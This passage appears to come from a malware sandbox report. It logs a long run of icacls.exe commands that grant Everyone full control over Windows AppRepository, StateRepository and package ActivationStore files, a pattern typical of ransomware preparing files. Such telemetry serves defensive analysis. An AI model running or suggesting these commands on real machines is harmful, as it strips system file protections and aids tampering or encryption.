- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4712
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:12256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11252
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12964
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16760
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16744
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13648
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd /grant Everyone:F /T /C /Q
  2⤵
  PID:15436
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q
  2⤵
  PID:11740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q
  2⤵
  PID:8212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q
  2⤵
  PID:11164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15416
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:11268
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:16020
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:15432
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:14064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:15756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16012
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:10596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12200
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:14060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:11712
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13776
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13680
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:15468
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:15772
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6480
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11540
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:2328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3764
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:1148
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10124
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:684
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6248
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:15064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:15312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:5984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5772
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:15384
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:16256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:10172
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13416
- C:\Windows\SYSTEM32\icacls.exe
